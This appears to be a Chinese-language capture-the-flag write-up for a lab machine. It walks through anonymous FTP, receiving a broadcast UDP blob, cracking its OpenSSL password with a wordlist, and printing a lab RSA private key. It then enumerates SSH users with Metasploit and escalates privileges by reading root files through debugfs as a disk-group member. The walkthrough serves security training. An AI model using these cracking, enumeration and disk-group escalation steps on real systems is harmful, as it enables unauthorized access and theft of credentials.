难度:medium

kali:192.168.1.105

靶机:192.168.1.104

> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.1.105
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     78:60:5b:04:b4:8c       TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.104   08:00:27:29:3d:eb       PCS Systemtechnik GmbH

端口扫描

> nmap 192.168.1.104               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-21 12:12 CST
Nmap scan report for 192.168.1.104
Host is up (0.000065s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
MAC Address: 08:00:27:29:3D:EB (Oracle VirtualBox virtual NIC)

不愧是你啊大公鸡,就是不给80端口

> nmap 192.168.1.104 -sV -A -p21,22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-21 12:13 CST
Nmap scan report for 192.168.1.104
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 1001     1001          124 Jun 11  2021 darkness.txt
22/tcp open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
MAC Address: 08:00:27:29:3D:EB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

FTP匿名登录

> ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD Server (Debian) [::ffff:192.168.1.104]
Name (192.168.1.104:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||25862|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      nogroup      4096 Jun 11  2021 .
drwxr-xr-x   2 ftp      nogroup      4096 Jun 11  2021 ..
-rw-r--r--   1 1001     1001          124 Jun 11  2021 darkness.txt
226 Transfer complete
ftp> get darkness.txt
local: darkness.txt remote: darkness.txt
229 Entering Extended Passive Mode (|||6946|)
150 Opening BINARY mode data connection for darkness.txt (124 bytes)
   124       59.06 KiB/s 
226 Transfer complete
124 bytes received in 00:00 (46.39 KiB/s)
ftp> 

ORmpNU.png
看到这么大的空白我就怀疑有隐写了

> stegsnow   darkness.txt 

没有snow也没有零宽0.0

抓包

> tcpdump host 192.168.1.104        
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
19:43:03.785230 IP 192.168.1.104.49176 > 255.255.255.255.24000: UDP, length 2294
19:43:03.785231 IP 192.168.1.104 > 255.255.255.255: udp
19:43:04.287550 IP 192.168.1.104.57943 > 255.255.255.255.24000: UDP, length 2294
19:43:04.287551 IP 192.168.1.104 > 255.255.255.255: udp
19:43:04.789685 IP 192.168.1.104.47668 > 255.255.255.255.24000: UDP, length 2294
19:43:04.789697 IP 192.168.1.104 > 255.255.255.255: udp
19:43:05.292215 IP 192.168.1.104.54752 > 255.255.255.255.24000: UDP, length 2294
19:43:05.292216 IP 192.168.1.104 > 255.255.255.255: udp
19:43:05.794125 IP 192.168.1.104.38420 > 255.255.255.255.24000: UDP, length 2294
19:43:05.794141 IP 192.168.1.104 > 255.255.255.255: udp
19:43:06.296009 IP 192.168.1.104.56061 > 255.255.255.255.24000: UDP, length 2294
19:43:06.296010 IP 192.168.1.104 > 255.255.255.255: udp
19:43:06.798001 IP 192.168.1.104.33462 > 255.255.255.255.24000: UDP, length 2294
19:43:06.798078 IP 192.168.1.104 > 255.255.255.255: udp
19:43:07.299941 IP 192.168.1.104.55860 > 255.255.255.255.24000: UDP, length 2294
19:43:07.299967 IP 192.168.1.104 > 255.255.255.255: udp
19:43:31.421525 IP 192.168.1.104.39962 > 255.255.255.255.24000: UDP, length 2294
19:43:31.421815 IP 192.168.1.104 > 255.255.255.255: udp
19:43:31.924051 IP 192.168.1.104.56808 > 255.255.255.255.24000: UDP, length 2294

发现靶机会广播一个udp包,端口是24000,接收一下看看是什么

> nc -lvnup 24000
listening on [any] 24000 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 45097
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

是一串base64

 ~/Desktop                                                                                                                                                                                                                                                                                           root@kali2  19:44:57 
> cat aaa | base64 -d > bbb

 ~/Desktop                                                                                                                                                                                                                                                                                           root@kali2  19:45:05 
> cat bbb                  
Salted__�;��?���"��E8�=5=#�"'k�������<v77?��g�˾$��Nu▒������y�2����I�b5�R����▒p�)���i������:����;ޟ�-�����-������F�}\
�g��<����^��n6��?Y�pW���3OW�;��[jRt4u�ѲN%�<![8�����H��ߏ��>�!�ƻx-I
G��IT����Qw_�ՒB2*�+���0I"�}� ��R��                               :-��O2D�ѱ����D�s�?�=0o��*n��   �▒�)�eRkkdJ!�c,A�y����Pd��Wr�����\��|�Ow��q���\)-0A��9`&g�����▒8���▒w����?��@+��
7k?7�3���,��I�
              ��F��3��Q>��z�*�6
                               .m�15���CȢt��y����v�v�c▒;�0�N�R���w���
                                                                     �h��0��/�r��:i�2�$�<�%�\��XG��2�dv˲��D�Lx��X:_$��2~S-n^`�
M'�����)h�$1�^��/u�t��d�i�]&�B��4�o|#�U?������@��~�,-����1akq���6-q8{�C�$��Xe�Ֆ�d�OI-o�_GI�-j�IM��m�� �Jg�uw?��1���j���3���Vw▒ʆ�;�;����Fz�(�<A
                                                                                                                                                @(�ea�j�)>�%`,��:�a�8��'�L�6��o��6����]�x�Y�+I���L:����@�s�
D��gS\��@���5�Y�����M>����o��!#�\t▒�>>���:JrL���g�xԎ�#W�\6�H�V�wUE�S��d���'O$��X�#��#�$���������ъ�X��f��ka�9`�fJ�����u�5>���(MRGʏs&��y��
ro�%���:D�      ��P� �>��o0|@#���~���S��O��X!��y�us��c'���:Zј���P�������E�������6W6E�i<eQ!�▒���~m��]�Y>/bFz�����H�qM�%�▒�\��D+!d�ժ�It�m� ;�C���b��O6Aڅ��US�>�!O����DxqJ���J �;oR�8npm�d��(1�����
                                                                            J1ŗ�Bg�n`�l�XU�Toդ▒▒�&@�▒�[f��&�m!>���t��[8e3?`���M����bY��m�7������;�zf%▒C��Nд�6`�*`��L��Wj��`����H�j#{�������3H������G�1 ��s}"Հl��c�▒))�z����8�uӁ�`��B�N��Z��e�0W�v.���������ߪ�Q,.�;~����8��sB�Ws�����A����o�Kk�Z�b�>$~��0a�׊O�1sZ6��j��{�⎡iHuA]r�^;�l��{S�����+�=[j�rFM�  ,�ڎ��▒��f�q�d�D���9j\�  ~�.��J  w!.;▒���8�.��B��g��>uG;�P�>�H|�
                                                                                               �W�F8�oάG{��?qG����G퐍��=��#                                                                                                                                                                                                
 ~/Desktop                                                                                                                                                                                                                                                                                           root@kali2  19:45:07 
> file bbb          
bbb: openssl enc'd data with salted password

发现是openssl密文,爆破一下密码,用sha256签名跑了出来

> bruteforce-salted-openssl bbb -f /usr/share/wordlists/rockyou.txt  -d sha256
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 89944
Tried passwords per second: inf
Last tried password: amoajesus

Password candidate: amoajesus

拿到密码amoajesus,然后根据这个密码拿私钥

> openssl  enc -aes-256-cbc -d -in bbb -out ccc
enter AES-256-CBC decryption password:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.

 ~/Desktop                                                                                                                                                                                   root@kali2  20:03:26 
> cat ccc
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4jJ321FfmddxmAyA+EUtxfMApwY32Zs1THtaWbU4jZ10Mzh8
/nRSWdXECqE5naPeNbUarNMYj2QIm3kn1w5LTB+RGYuZBfJixmD15dnQly5AOBG5
p02yHVDKPQ7DAmjRtgYav0n8UHp5wAu2wwQDthxv8soGwqdbPV+Ly+zfePjclcIX
5KMrdBasiuUr5RRGCtzspdfXC3tqD8HgWThXN8hLenyGPXA/r0g/bRj7l5W8Pqre
mk8HkxDO+vrPRgNvqo3Z2hSXulw1dGTkMuwDEkEXUPxqDXGPzzh5o6h6/2vw6HeJ
3Ik1XXumWsWPZRU0j3a98Z4woMfCN5agN7GqGwIDAQABAoIBAHdip7wL4OdzvLLB
trhS2uvla+y77XJe5uytFmzOp0CnYBNAt0gd4PElUElD+wLm4Ht8UM3yxL250Iku
kwaAtuFAr/bJpURsQBHwTxi3s853TNHLGS/iZCXw5C0Bw49b/4ORCUD5LcDUQ7pG
9HlNfx/5NmTwmEzYw+FKsqA5L2HLCWLLIhArWYOUTpc/4dLzfILRS0wBidEWF/x9
S+PCQdSUOrXfIKyt6dhZRDBMQbCas0uDvTF+qh5VEPX8niK91iG7zaD45RYG1hm+
9jaihCE0M1/pBnMj/REmFupQb9BKs6lPepjtoC4uaSRsZI5P+7lq11wZMjjXDpH+
AfofscECgYEA/G4XDgZPAZW7bMt1xYICioj/woD3edP+6U2XAcJ9sLYBLLck2Tp9
TeHvGAjvbglTiSJYzGFAdPqZxixnCqzrv/Bnsg5hPp7oqtN4liZxtfwyLP10Y7oT
+oO1yJFn/ZRyN2QRUSLOusLIcDTg6mwI64q2rm1dijIGpbCAJnTeXqsCgYEA5WVn
PTyIZut46TBuC4a/QodP/1eJkRQFgIRvC2a9c3atB5FQIziwymmD/J3myAgqKXkT
rPfiiiasal+rUSW9suXf4WROEpV26lk+fFZkswtPQVTYg9/r+f/GbM04aDdQFGay
uAT3FbNipkB+5zxsLA44JKli9W4ye+so3CJJIlECgYEA25QoGdsC/q3wy0Jwv83H
yBpD4D2vCBqQswD7SlyUWRL5Epx9QTjPpt/Ry2Z6X41dTPzDoYU3PIqBGRGm0HJ6
4AuPKCO6E27HlVE+o93tLBCk1N3kUJucpV3M0xspCjwG3of9SEau7WZiVLiqrUAs
wjd3kWMw6vV5MsfFsa4XgOECgYEAz5/hOl6wgp67+CuaXppeP+Pi9xSO8Z2ygSjc
rPAXpwsR/xh59PcZpIquKJXuTLx/FLx+n35ZL3tjcIAYukCzmtlOsl0sAMwBLokJ
8lXrnNYurM4TjgC9P7BOMynn1QPDWkO9nKr5zE1pi1oywi5BJfrUu/IIHGXaEai9
eckacpECgYA8xTCDoliocyinyJ7EdI4J0/pgbHEcwJ3XeZCh+WyDJZGB/6cSGyI8
isAZnRCL0ml2ukrq+mdQ2WjSQLxNZGrM0ePxl5Qvv2Bzeyn2gSKInQlYZ5rAItkR
i3gLubHaM/au4vhu65nmM5ni7R9bUKZ3sXR74+tXlKXsupuwJR0aDA==
-----END RSA PRIVATE KEY-----

拿到私钥了,但是没用用户名,用msf上面的ssh用户名枚举

ssh用户名枚举

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.1.104:22 - SSH - Using malformed packet technique
[*] 192.168.1.104:22 - SSH - Checking for false positives
[*] 192.168.1.104:22 - SSH - Starting scan
[+] 192.168.1.104:22 - SSH - User 'mail' found
[+] 192.168.1.104:22 - SSH - User 'root' found
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.1.104:22 - SSH - Using malformed packet technique
[*] 192.168.1.104:22 - SSH - Checking for false positives
[*] 192.168.1.104:22 - SSH - Starting scan
[+] 192.168.1.104:22 - SSH - User 'mail' found
[+] 192.168.1.104:22 - SSH - User 'root' found
[+] 192.168.1.104:22 - SSH - User 'news' found
[+] 192.168.1.104:22 - SSH - User 'man' found
[+] 192.168.1.104:22 - SSH - User 'bin' found
[+] 192.168.1.104:22 - SSH - User 'games' found
[+] 192.168.1.104:22 - SSH - User 'nobody' found
[+] 192.168.1.104:22 - SSH - User 'abraham' found
[+] 192.168.1.104:22 - SSH - User 'backup' found

拿到一个用户名abraham

ssh连接

> chmod 600 ccc                

 ~/Desktop                                                                                                                                                                                   root@kali2  20:34:20 
> ssh -i ccc abraham@192.168.1.104
Last login: Sun Jun 20 11:36:51 2021 from 192.168.0.28
abraham@nightfall:~$ ls -al
total 44
drwx------ 5 abraham disk 4096 Jun 20  2021 .
drwxr-xr-x 3 root    root 4096 Jun 12  2021 ..
lrwxrwxrwx 1 root    root    9 Jun 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 abraham disk  220 Jun 12  2021 .bash_logout
-rw-r--r-- 1 abraham disk 3526 Jun 12  2021 .bashrc
drwx------ 3 abraham disk 4096 Jun 12  2021 .gnupg
drwxr-xr-x 3 abraham disk 4096 Jun 12  2021 .local
-rw-r--r-- 1 abraham disk  807 Jun 12  2021 .profile
-rw-r--r-- 1 abraham disk   66 Jun 12  2021 .selected_editor
drwx------ 2 abraham disk 4096 Jun 20  2021 .ssh
-rw-r--r-- 1 abraham disk 2294 Jun 20  2021 door.txt
-rwx------ 1 abraham disk   33 Jun 20  2021 user.txt
abraham@nightfall:~$ 

提权

abraham@nightfall:~$ cat door.txt 
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

这个就是广播的文件

abraham@nightfall:~$ id
uid=1000(abraham) gid=6(disk) groups=6(disk)

看到这个用户所属组是disk,在Hacktrick上面找到了相关信息
ORPEvX.png
Disk组类似有root的权限,可以访问机器的所有数据

abraham@nightfall:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.44.5 (15-Dec-2018)
debugfs:  cat /root/root.txt
*****